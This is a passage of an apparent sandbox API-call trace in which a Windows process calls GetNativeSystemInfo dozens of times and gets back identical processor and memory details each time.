	[0126.275] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.276] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.277] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.278] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.279] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.280] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
	[0126.281] GetNativeSystemInfo (in: lpSystemInfo=0x18ff10 | out: lpSystemInfo=0x18ff10*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) 
